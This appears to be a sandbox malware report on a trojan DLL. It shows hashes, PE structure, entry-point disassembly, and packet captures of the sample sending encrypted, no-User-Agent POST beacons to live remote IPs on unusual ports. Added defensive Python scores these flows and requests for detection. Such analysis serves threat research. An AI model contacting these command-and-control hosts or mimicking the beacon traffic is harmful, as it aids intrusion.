• DOS Executable Generic (2002/1) 0.20%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: SecuriteInfo.com.Variant.Razy.980776.4470.dll
File size: 1375232
MD5: c7cf1a1238e4a42eebf9cd70a5cf091c
SHA1: 4ac755ac7e852daa204caced88887bdfce48a57f
SHA256: f0a31b853ed15c70abd7b13ebb381500188e61d4b8fdee1cd2a922d79a4d1e77
SHA512: 55e4d69ccd7a64a19621afedc114f01cd72f2f565a9e8a9eb5bf560438d65665561edd4bb0a2d3df79161a49c2d2ff4df2e68cc069aed02b6d9b1a6960044c3a
SSDEEP: 24576:0nxqsL+DvNdnhMr5Lo6dOGcuQNrSH9d6N9eYWtZgDxxxSPnsqz7puATt5csRbu7D:0cfk82uAJTI7DPswKwua
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........S.U.=.U.=.U.=..,..Q.=.\...O.=...?.Q.=...8.F.=...>.L.=...;.|.=..,..A.=.U.<...=...2...=...<.T.=.....T.=...>.T.=.RichU.=........

File Icon

Icon Hash: 74f0e4ecccdce0e4

Static PE Info

General

Entrypoint: 0x4336b0
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x5BBD86DE [Wed Oct 10 04:58:06 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: ccbe70d6d0d02f6248ca160d6a0bb85b

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007F66B0E07B27h
call 00007F66B0E08857h
mov eax, dword ptr [ebp+10h]
push eax
mov ecx, dword ptr [ebp+0Ch]
push ecx
mov edx, dword ptr [ebp+08h]
push edx
call 00007F66B0E07916h
add esp, 0Ch
pop ebp
retn 000Ch
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
mov eax, dword ptr [0054806Ch]
xor edx, edx
mov ecx, 00000020h
div ecx
push edx
mov edx, dword ptr [ebp+08h]
xor edx, dword ptr [0054806Ch]
push edx
call 00007F66B0E07B64h
add esp, 08h
pop ebp
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
mov eax, dword ptr [0054806Ch]
xor edx, edx
mov ecx, 00000020h
div ecx
mov eax, 00000020h
sub eax, edx
push eax
mov ecx, dword ptr [ebp+08h]
push ecx
call 00007F66B0E07B33h
add esp, 08h
xor eax, dword ptr [0054806Ch]
pop ebp
ret
int3
int3
int3
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
mov ecx, dword ptr [ebp+0Ch]
ror eax, cl
pop ebp
ret
int3
int3
int3
push ebp
mov ebp, esp
call 00007F66B0E08EBDh
push eax
call 00007F66B0E49BC7h
add esp, 04h
pop ebp
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
sub esp, 18h
mov eax, dword ptr [ebp+00h]

Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x147190         0x6c          .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT          0x1471fc         0x28          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x0              0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x15c000         0x72b4        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x143110         0x54          .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x143168         0x40          .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0xc7000          0x184         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type                                      Entropy        Characteristics
.text   0x1000           0xc5e2f       0xc6000   False     0.442065922901   data                                           6.4781248897   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata  0xc7000          0x80aec       0x80c00   False     0.534105734223   data                                           5.52055296156  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0x148000         0x13ba0       0x1800    False     0.1875           DOS executable (block device driverpyright)    3.99635070896  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc  0x15c000         0x72b4        0x7400    False     0.710264008621   data                                           6.69742088731  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL: KERNEL32.dll
Import: GetCurrentDirectoryA, GetTempPathA, GetWindowsDirectoryA, VirtualProtectEx, FindFirstChangeNotificationA, FlushFileBuffers, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, EncodePointer, DecodePointer, SetLastError, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, GetModuleHandleW, GetProcAddress, WideCharToMultiByte, MultiByteToWideChar, GetStringTypeW, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RtlUnwind, RaiseException, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, FreeLibrary, LoadLibraryExW, GetModuleFileNameA, GetModuleFileNameW, GetModuleHandleExW, HeapAlloc, HeapValidate, GetSystemInfo, ExitProcess, GetStdHandle, GetFileType, WriteFile, OutputDebugStringA, OutputDebugStringW, WriteConsoleW, CloseHandle, WaitForSingleObjectEx, CreateThread, SetConsoleCtrlHandler, GetCurrentThread, GetDateFormatW, GetTimeFormatW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, HeapFree, HeapReAlloc, HeapSize, HeapQueryInformation, GetACP, GetProcessHeap, GetTimeZoneInformation, FindClose, FindFirstFileExA, FindFirstFileExW, FindNextFileA, FindNextFileW, IsValidCodePage, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetEnvironmentVariableW, SetStdHandle, GetConsoleCP, GetConsoleMode, SetFilePointerEx, CreateFileW

Exports

Name        Ordinal  Address
Bluewing    1        0x49eed0
Earth       2        0x49efd0
Masterjust  3        0x49eb20

Network Behavior

Network Port Distribution

TCP Packets

Timestamp                             Source Port  Dest Port  Source IP        Dest IP
Oct 28, 2021 04:44:57.697280884 CEST  49753        443        192.168.2.5      192.46.210.220
Oct 28, 2021 04:44:57.697323084 CEST  443          49753      192.46.210.220   192.168.2.5
Oct 28, 2021 04:44:57.697465897 CEST  49753        443        192.168.2.5      192.46.210.220
Oct 28, 2021 04:44:57.720228910 CEST  49753        443        192.168.2.5      192.46.210.220
Oct 28, 2021 04:44:57.720257998 CEST  443          49753      192.46.210.220   192.168.2.5
Oct 28, 2021 04:44:58.248492956 CEST  443          49753      192.46.210.220   192.168.2.5
Oct 28, 2021 04:44:58.248651028 CEST  49753        443        192.168.2.5      192.46.210.220
Oct 28, 2021 04:45:00.905421019 CEST  49753        443        192.168.2.5      192.46.210.220
Oct 28, 2021 04:45:00.905451059 CEST  443          49753      192.46.210.220   192.168.2.5
Oct 28, 2021 04:45:00.905803919 CEST  443          49753      192.46.210.220   192.168.2.5
Oct 28, 2021 04:45:00.905872107 CEST  49753        443        192.168.2.5      192.46.210.220
Oct 28, 2021 04:45:00.956618071 CEST  49753        443        192.168.2.5      192.46.210.220
Oct 28, 2021 04:45:00.956773996 CEST  49753        443        192.168.2.5      192.46.210.220
Oct 28, 2021 04:45:00.956866980 CEST  443          49753      192.46.210.220   192.168.2.5
Oct 28, 2021 04:45:01.670440912 CEST  443          49753      192.46.210.220   192.168.2.5
Oct 28, 2021 04:45:01.670523882 CEST  443          49753      192.46.210.220   192.168.2.5
Oct 28, 2021 04:45:01.670671940 CEST  49753        443        192.168.2.5      192.46.210.220
Oct 28, 2021 04:45:01.679336071 CEST  49753        443        192.168.2.5      192.46.210.220
Oct 28, 2021 04:45:01.679377079 CEST  443          49753      192.46.210.220   192.168.2.5
Oct 28, 2021 04:45:01.857713938 CEST  49754        808        192.168.2.5      143.244.140.214
Oct 28, 2021 04:45:02.017347097 CEST  808          49754      143.244.140.214  192.168.2.5
Oct 28, 2021 04:45:02.017538071 CEST  49754        808        192.168.2.5      143.244.140.214
Oct 28, 2021 04:45:02.019695044 CEST  49754        808        192.168.2.5      143.244.140.214
Oct 28, 2021 04:45:02.178284883 CEST  808          49754      143.244.140.214  192.168.2.5
Oct 28, 2021 04:45:02.180129051 CEST  808          49754      143.244.140.214  192.168.2.5
Oct 28, 2021 04:45:02.180244923 CEST  49754        808        192.168.2.5      143.244.140.214
Oct 28, 2021 04:45:04.873534918 CEST  49754        808        192.168.2.5      143.244.140.214
Oct 28, 2021 04:45:05.032200098 CEST  808          49754      143.244.140.214  192.168.2.5
Oct 28, 2021 04:45:05.032458067 CEST  808          49754      143.244.140.214  192.168.2.5
Oct 28, 2021 04:45:05.032540083 CEST  49754        808        192.168.2.5      143.244.140.214
Oct 28, 2021 04:45:05.033545971 CEST  49754        808        192.168.2.5      143.244.140.214
Oct 28, 2021 04:45:05.033744097 CEST  49754        808        192.168.2.5      143.244.140.214
Oct 28, 2021 04:45:05.191919088 CEST  808          49754      143.244.140.214  192.168.2.5
Oct 28, 2021 04:45:05.192060947 CEST  808          49754      143.244.140.214  192.168.2.5
Oct 28, 2021 04:45:05.192089081 CEST  808          49754      143.244.140.214  192.168.2.5
Oct 28, 2021 04:45:05.192131996 CEST  808          49754      143.244.140.214  192.168.2.5
Oct 28, 2021 04:45:05.192151070 CEST  808          49754      143.244.140.214  192.168.2.5
Oct 28, 2021 04:45:05.579915047 CEST  808          49754      143.244.140.214  192.168.2.5
Oct 28, 2021 04:45:05.579957008 CEST  808          49754      143.244.140.214  192.168.2.5
                                                                                                        Oct 28, 2021 04:45:05.580094099 CEST49754808192.168.2.5143.244.140.214
                                                                                                        Oct 28, 2021 04:45:05.588696003 CEST49754808192.168.2.5143.244.140.214
                                                                                                        Oct 28, 2021 04:45:05.748291969 CEST80849754143.244.140.214192.168.2.5
                                                                                                        Oct 28, 2021 04:45:05.762017012 CEST497566891192.168.2.545.77.0.96
                                                                                                        Oct 28, 2021 04:45:05.927361012 CEST68914975645.77.0.96192.168.2.5
                                                                                                        Oct 28, 2021 04:45:05.927464962 CEST497566891192.168.2.545.77.0.96
                                                                                                        Oct 28, 2021 04:45:05.928914070 CEST497566891192.168.2.545.77.0.96
                                                                                                        Oct 28, 2021 04:45:06.089112043 CEST49757443192.168.2.5192.46.210.220
                                                                                                        Oct 28, 2021 04:45:06.089162111 CEST44349757192.46.210.220192.168.2.5
                                                                                                        Oct 28, 2021 04:45:06.089255095 CEST49757443192.168.2.5192.46.210.220
                                                                                                        Oct 28, 2021 04:45:06.094197035 CEST68914975645.77.0.96192.168.2.5
                                                                                                        Oct 28, 2021 04:45:06.095264912 CEST68914975645.77.0.96192.168.2.5
                                                                                                        Oct 28, 2021 04:45:06.095343113 CEST497566891192.168.2.545.77.0.96
                                                                                                        Oct 28, 2021 04:45:06.111243010 CEST497566891192.168.2.545.77.0.96
                                                                                                        Oct 28, 2021 04:45:06.125977993 CEST49757443192.168.2.5192.46.210.220
                                                                                                        Oct 28, 2021 04:45:06.126005888 CEST44349757192.46.210.220192.168.2.5
                                                                                                        Oct 28, 2021 04:45:06.276961088 CEST68914975645.77.0.96192.168.2.5
                                                                                                        Oct 28, 2021 04:45:06.277069092 CEST497566891192.168.2.545.77.0.96
                                                                                                        Oct 28, 2021 04:45:06.282375097 CEST497566891192.168.2.545.77.0.96
                                                                                                        Oct 28, 2021 04:45:06.282541037 CEST497566891192.168.2.545.77.0.96
                                                                                                        Oct 28, 2021 04:45:06.447794914 CEST68914975645.77.0.96192.168.2.5
                                                                                                        Oct 28, 2021 04:45:06.447828054 CEST68914975645.77.0.96192.168.2.5
                                                                                                        Oct 28, 2021 04:45:06.486299038 CEST68914975645.77.0.96192.168.2.5
                                                                                                        Oct 28, 2021 04:45:06.640497923 CEST44349757192.46.210.220192.168.2.5
                                                                                                        Oct 28, 2021 04:45:06.640641928 CEST49757443192.168.2.5192.46.210.220
                                                                                                        Oct 28, 2021 04:45:06.833203077 CEST68914975645.77.0.96192.168.2.5
                                                                                                        Oct 28, 2021 04:45:06.833235025 CEST68914975645.77.0.96192.168.2.5
                                                                                                        Oct 28, 2021 04:45:06.833303928 CEST497566891192.168.2.545.77.0.96
                                                                                                        Oct 28, 2021 04:45:06.833374023 CEST497566891192.168.2.545.77.0.96
                                                                                                        Oct 28, 2021 04:45:06.840776920 CEST497566891192.168.2.545.77.0.96
                                                                                                        Oct 28, 2021 04:45:06.936594963 CEST49757443192.168.2.5192.46.210.220
                                                                                                        Oct 28, 2021 04:45:06.936634064 CEST44349757192.46.210.220192.168.2.5
                                                                                                        Oct 28, 2021 04:45:06.936899900 CEST44349757192.46.210.220192.168.2.5
                                                                                                        Oct 28, 2021 04:45:06.937027931 CEST49757443192.168.2.5192.46.210.220
                                                                                                        Oct 28, 2021 04:45:06.955482006 CEST49757443192.168.2.5192.46.210.220
                                                                                                        Oct 28, 2021 04:45:06.955606937 CEST49757443192.168.2.5192.46.210.220
                                                                                                        Oct 28, 2021 04:45:06.955657005 CEST44349757192.46.210.220192.168.2.5
                                                                                                        Oct 28, 2021 04:45:06.964852095 CEST497588116192.168.2.5185.56.219.47
                                                                                                        Oct 28, 2021 04:45:07.006103992 CEST68914975645.77.0.96192.168.2.5
                                                                                                        Oct 28, 2021 04:45:07.014190912 CEST811649758185.56.219.47192.168.2.5
                                                                                                        Oct 28, 2021 04:45:07.014384031 CEST497588116192.168.2.5185.56.219.47
                                                                                                        Oct 28, 2021 04:45:07.016547918 CEST497588116192.168.2.5185.56.219.47
                                                                                                        Oct 28, 2021 04:45:07.065592051 CEST811649758185.56.219.47192.168.2.5
                                                                                                        Oct 28, 2021 04:45:07.074626923 CEST811649758185.56.219.47192.168.2.5
                                                                                                        Oct 28, 2021 04:45:07.074647903 CEST811649758185.56.219.47192.168.2.5
                                                                                                        Oct 28, 2021 04:45:07.074729919 CEST497588116192.168.2.5185.56.219.47
                                                                                                        Oct 28, 2021 04:45:07.074769020 CEST497588116192.168.2.5185.56.219.47
                                                                                                        Oct 28, 2021 04:45:07.084959030 CEST497588116192.168.2.5185.56.219.47
                                                                                                        Oct 28, 2021 04:45:07.135117054 CEST811649758185.56.219.47192.168.2.5
                                                                                                        Oct 28, 2021 04:45:07.135226965 CEST497588116192.168.2.5185.56.219.47
                                                                                                        Oct 28, 2021 04:45:07.136121988 CEST497588116192.168.2.5185.56.219.47
                                                                                                        Oct 28, 2021 04:45:07.136277914 CEST497588116192.168.2.5185.56.219.47
                                                                                                        Oct 28, 2021 04:45:07.185216904 CEST811649758185.56.219.47192.168.2.5
                                                                                                        Oct 28, 2021 04:45:07.185512066 CEST811649758185.56.219.47192.168.2.5
                                                                                                        Oct 28, 2021 04:45:07.375144958 CEST811649758185.56.219.47192.168.2.5
                                                                                                        Oct 28, 2021 04:45:07.375186920 CEST811649758185.56.219.47192.168.2.5
                                                                                                        Oct 28, 2021 04:45:07.375257015 CEST497588116192.168.2.5185.56.219.47
                                                                                                        Oct 28, 2021 04:45:07.375289917 CEST497588116192.168.2.5185.56.219.47
                                                                                                        Oct 28, 2021 04:45:07.387031078 CEST497588116192.168.2.5185.56.219.47
                                                                                                        Oct 28, 2021 04:45:07.436152935 CEST811649758185.56.219.47192.168.2.5
                                                                                                        Oct 28, 2021 04:45:07.513472080 CEST49761443192.168.2.5192.46.210.220
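The packet list above is easier to reason about as flows: the sandbox VM 192.168.2.5 talks to 192.46.210.220 on 443 and to three further hosts on 808, 6891 and 8116, and every one of them answers. The Python below is an added example written for this page, not part of the Joe Sandbox report and not Dridex code. It takes rows of the TCP packet table (a transcribed subset is embedded inline, in a '|'-separated form chosen here), groups them into flows relative to the analysis host, and flags remote endpoints that are on ports other than 80 and 443 together with whether the remote side ever replied. The "standard" port set and the row delimiter are this example's assumptions.

```python
"""Flow summariser over sandbox TCP packet rows (added example, not report code)."""
from dataclasses import dataclass, field

ANALYSIS_HOST = "192.168.2.5"      # the sandbox VM, as seen throughout the report
STANDARD_PORTS = {80, 443}         # assumption: ports this check treats as ordinary

# Constructed sample: a subset of the report's TCP packet rows, columns
# Timestamp | Source Port | Dest Port | Source IP | Dest IP.
SAMPLE_ROWS = """\
Oct 28, 2021 04:45:01.670523882 CEST|443|49753|192.46.210.220|192.168.2.5
Oct 28, 2021 04:45:01.670671940 CEST|49753|443|192.168.2.5|192.46.210.220
Oct 28, 2021 04:45:01.857713938 CEST|49754|808|192.168.2.5|143.244.140.214
Oct 28, 2021 04:45:02.017347097 CEST|808|49754|143.244.140.214|192.168.2.5
Oct 28, 2021 04:45:05.762017012 CEST|49756|6891|192.168.2.5|45.77.0.96
Oct 28, 2021 04:45:05.927361012 CEST|6891|49756|45.77.0.96|192.168.2.5
Oct 28, 2021 04:45:06.089112043 CEST|49757|443|192.168.2.5|192.46.210.220
Oct 28, 2021 04:45:06.964852095 CEST|49758|8116|192.168.2.5|185.56.219.47
Oct 28, 2021 04:45:07.014190912 CEST|8116|49758|185.56.219.47|192.168.2.5
Oct 28, 2021 04:45:07.513472080 CEST|49761|443|192.168.2.5|192.46.210.220
"""


@dataclass
class Flow:
    """All packets between the analysis host and one remote (ip, port)."""
    remote_ip: str
    remote_port: int
    local_ports: set = field(default_factory=set)   # ephemeral ports used by the VM
    packets_out: int = 0                             # VM -> remote
    packets_in: int = 0                              # remote -> VM
    first_seen: str = ""
    last_seen: str = ""


def parse_rows(text):
    """Yield (timestamp, sport, dport, sip, dip) from '|'-separated table rows."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, sport, dport, sip, dip = line.split("|")
        yield ts, int(sport), int(dport), sip, dip


def summarise_flows(text, local=ANALYSIS_HOST):
    """Group packets into flows keyed by (remote_ip, remote_port)."""
    flows = {}
    for ts, sport, dport, sip, dip in parse_rows(text):
        if sip == local:                       # outbound packet
            key, outbound, lport = (dip, dport), True, sport
        elif dip == local:                     # inbound packet
            key, outbound, lport = (sip, sport), False, dport
        else:
            continue                           # neither side is the sandbox VM
        flow = flows.setdefault(key, Flow(key[0], key[1], first_seen=ts))
        flow.local_ports.add(lport)
        if outbound:
            flow.packets_out += 1
        else:
            flow.packets_in += 1
        flow.last_seen = ts
    return flows


def suspicious_flows(flows, standard=STANDARD_PORTS):
    """(ip, port, answered) for every remote endpoint on a non-standard port.

    'answered' separates a live peer from a dead one: a remote that never
    replies is a stale C2 entry, a remote that does is worth blocking first.
    """
    hits = [(ip, port, flow.packets_in > 0)
            for (ip, port), flow in flows.items() if port not in standard]
    return sorted(hits, key=lambda h: h[1])


if __name__ == "__main__":
    for ip, port, answered in suspicious_flows(summarise_flows(SAMPLE_ROWS)):
        print(f"{ip}:{port}  answered={answered}")
```

Run over the full table the same way; the only thing to adapt is `parse_rows` if the rows are delimited differently. The port allow-list is deliberately tiny, so the point is the pairing of "non-standard port" with "remote answered": all three non-443 peers here replied within 200 ms, which is what makes them immediate blocking candidates alongside 192.46.210.220.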

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Oct 28, 2021 04:48:41.884382963 CEST | 8.8.8.8 | 192.168.2.5 | 0x7e0e | No error (0) | prda.aadg.msidentity.com | www.tm.a.prd.aadg.akadns.net | | CNAME (Canonical name) | IN (0x0001)

HTTP Request Dependency Graph

• 192.46.210.220

HTTPS Proxied Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49753 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:45:00 UTC | 0 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4844
Connection: Close
Cache-Control: no-cache
2021-10-28 02:45:00 UTC | 0 | OUT | Data Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:45:01 UTC | 4 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:45:01 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.5 | 49757 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:45:06 UTC | 4 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4832
Connection: Close
Cache-Control: no-cache
2021-10-28 02:45:06 UTC | 5 | OUT | Data Raw: 13 4a 53 30 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: JS0#W^Bh%J\H2aJ*>J|Z!FxoCk1kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:45:07 UTC | 9 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:45:07 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


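The proxied sessions above all look the same on the wire: a POST to / on a bare IP literal, no User-Agent, no Content-Type, a fixed-size binary body, and a 403 from nginx. Two of those traits are exactly what the report's "HTTP GET or POST without a user agent" signature fires on. The Python below is an added example written for this page, not part of the Joe Sandbox report and not Dridex code: it parses the captured request head and scores it against a handful of header heuristics, measures the entropy of the captured body prefix, and compares the 4844-byte and 4832-byte body variants byte by byte. The request line, headers and hex bodies are copied from sessions 0 and 1; the rule names and the 6.0 bits/byte threshold are this example's own choices.

```python
"""Header and body heuristics over the captured C2 POST (added example, not report code)."""
import math
import re
from collections import Counter

# Request head exactly as captured in session 0: no User-Agent, no Content-Type.
REQUEST_A = (
    b"POST / HTTP/1.1\r\n"
    b"Host: 192.46.210.220\r\n"
    b"Content-Length: 4844\r\n"
    b"Connection: Close\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n"
)

# Captured prefix of the 4844-byte body ("Data Raw", session 0).
BODY_A = bytes.fromhex(
    "56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48"
    "f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7"
    "6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17"
    "8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24"
    "e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16"
    "fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7"
    "bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24"
    "5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a"
)

# First 96 bytes of the 4832-byte variant ("Data Raw", session 1).
BODY_B_PREFIX = bytes.fromhex(
    "13 4a 53 30 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48"
    "f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7"
    "6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17"
)

IPV4_HOST = re.compile(rb"^\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?$")


def parse_request(raw):
    """Split an HTTP/1.1 request head into (method, target, headers); names lower-cased."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    method, target, _version = lines[0].split(b" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def shannon_entropy(data):
    """Entropy in bits per byte; 8.0 is the ceiling for byte-valued data."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def score_request(raw_head, body, entropy_threshold=6.0):
    """Names of the heuristics the request trips (threshold is an assumption)."""
    method, target, headers = parse_request(raw_head)
    hits = []
    if b"user-agent" not in headers:
        hits.append("no-user-agent")
    if IPV4_HOST.match(headers.get(b"host", b"")):
        hits.append("host-is-ip-literal")
    if method == b"POST" and target == b"/":
        hits.append("post-to-root")
    if method == b"POST" and b"content-type" not in headers:
        hits.append("no-content-type")
    if shannon_entropy(body) >= entropy_threshold:
        hits.append("high-entropy-body")
    return hits


def diff_offsets(a, b):
    """Offsets at which two byte strings differ, over their common length."""
    return [i for i, (x, y) in enumerate(zip(a, b)) if x != y]


if __name__ == "__main__":
    print(score_request(REQUEST_A, BODY_A))
    print(round(shannon_entropy(BODY_A), 2), "bits/byte")
    print(diff_offsets(BODY_A[:len(BODY_B_PREFIX)], BODY_B_PREFIX))
```

The byte comparison is the part worth keeping in mind when writing detections for this sample: within the captured prefix the two body variants differ only in the first four bytes and in three bytes around offset 78, and the rest is identical across every session on the page. Matching on the fixed tail would work for this capture but will not survive a key or build change, so header-shape rules (no User-Agent, IP-literal Host, POST to /, no Content-Type) are the more durable side of the pair.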
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
